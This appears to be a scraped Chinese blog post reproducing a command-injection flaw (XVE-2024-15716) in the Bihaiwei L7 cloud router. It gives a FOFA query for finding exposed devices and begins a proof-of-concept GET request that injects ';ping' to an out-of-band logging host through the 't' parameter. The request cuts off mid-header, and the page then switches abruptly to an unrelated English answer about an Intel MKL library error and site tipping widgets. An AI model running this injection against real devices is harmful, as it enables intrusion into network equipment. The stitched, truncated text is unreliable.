碧海威L7云路由无线运营版 confirm.php/jumper.php 命令注入漏洞复现(XVE-2024-15716)

0x01 产品简介

碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品,基于国产化ARM硬件平台,采用软硬一体协同设计方案,释放出产品最大效能,具有高性能,高扩展,产品性能强劲,具备万兆吞吐能力,支持上万用户同时在线等高性能。其采用简单清晰的可视化WEB管理界面,支持最新HTML5,方便移动设备访问管理,分级别多层次管理模块,使用简单,维护方便;设备状况、网络流量一目了然,一键备份/恢复,让网络管理更简单。是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备,具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。

0x02 漏洞概述

碧海威L7 confirm.php、jumper.php接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

0x03 影响范围

碧海威科技-L7

0x04 复现环境

FOFA:app="碧海威科技-L7云路由"

0x05 漏洞复现

PoC-1

GET /notice/confirm.php?t=;ping%20fwvjytharz.dgrh3.cn HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
The error message you encountered indicates that there is an issue loading the Intel Math Kernel Library (MKL) dynamic library file `libmkl_rt.so.1` in your Python environment. This error can occur due to various reasons, such as incorrect installation or configuration issues. Here are a few steps you can try to resolve the issue: 1. Check MKL Installation: Ensure that Intel MKL is properly installed on your system. You can visit the official Intel website and follow the instructions to download and install the MKL library for your operating system. 2. Verify Library Path: Confirm that the library path specified in the error message (`/opt/anaconda3/lib/python3.10/site-packages/mkl/../../../libmkl_rt.so.1`) is correct. It should point to the location of the `libmkl_rt.so.1` file on your system. Make sure the file exists at that location. 3. Update LD_LIBRARY_PATH: Set the `LD_LIBRARY_PATH` environment variable to include the directory where the `libmkl_rt.so.1` file is located. You can do this by running the following command before executing your Python script: ``` export LD_LIBRARY_PATH=/path/to/mkl:$LD_LIBRARY_PATH ``` Replace `/path/to/mkl` with the actual directory path containing the `libmkl_rt.so.1` file. 4. Conda Environment Activation: If you are using Anaconda or Miniconda, try activating your conda environment before running the Python script. This ensures that the correct MKL libraries associated with your environment are loaded. 5. Reinstall Libraries: If the above steps do not resolve the issue, you can try reinstalling the relevant libraries, including NumPy, MKL, and any other packages that depend on them. You can use the following commands: ``` conda uninstall numpy mkl conda install numpy mkl ``` This will uninstall and then reinstall the NumPy and MKL libraries using conda. If the issue still persists after trying these steps, it would be helpful to provide more information about your system configuration, the specific steps you followed during the installation, and any additional error messages or traceback information you received.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值